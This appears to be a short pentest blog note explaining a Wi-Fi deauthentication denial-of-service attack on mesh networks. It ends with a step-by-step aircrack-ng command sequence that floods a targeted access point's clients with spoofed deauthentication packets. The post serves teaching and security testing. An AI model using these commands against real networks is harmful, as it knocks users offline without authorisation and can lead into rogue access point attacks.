As a result everyone from your attacked network will be kicked out from it,we may say that Its simply a DoS
The connection between the Mesh clients and Mesh APs has been be established by the exchange of various frames.After that the exchange of the series of management frames like authentication and association request frame takes place.As these frames are unprotected and sent in clear. So these frames has been spoofed by the attacker. The attacker then sends deauthentication requests with the client’s address set as the source. Then the mesh AP responds by sending the deauthentication response to the client. Thus the communication between the client and the AP has been halted. As deauthentication requests are notifications, so cannot be ignored and the AP responds instantly to these requests . The attacker can periodically scan all the channels and send these spoofed messages to valid clients thus terminating their connection.
During the attack the client has been deauthenticated and thus may probe other networks and connect to any other mesh AP available in the range with good signal strength.Second stage of this DOS can be Rogue AP Attack.
# airmon-ng (shows your wlan interfaces)
# airmon-ng start wlan0 (enable monitoring mode on wlan0)
# airodump-ng mon0 (Get the related info of victim AP)
# airodump-ng -c 11 -b 1C:65:9D:B5:D8:C1 mon0 (go inside the related AP, define channel and MAC)
# aireplay-ng --deauth 100 -c FF:FF:FF:FF:FF:FF -a 1C:65:9D:B5:D8:C1 mon0 (start sending deauthentication packets,Open a separate ssh session)
I also decided to write other than Checkpoint,
more pentest related notes will be on this site.
Thx
Cagdas
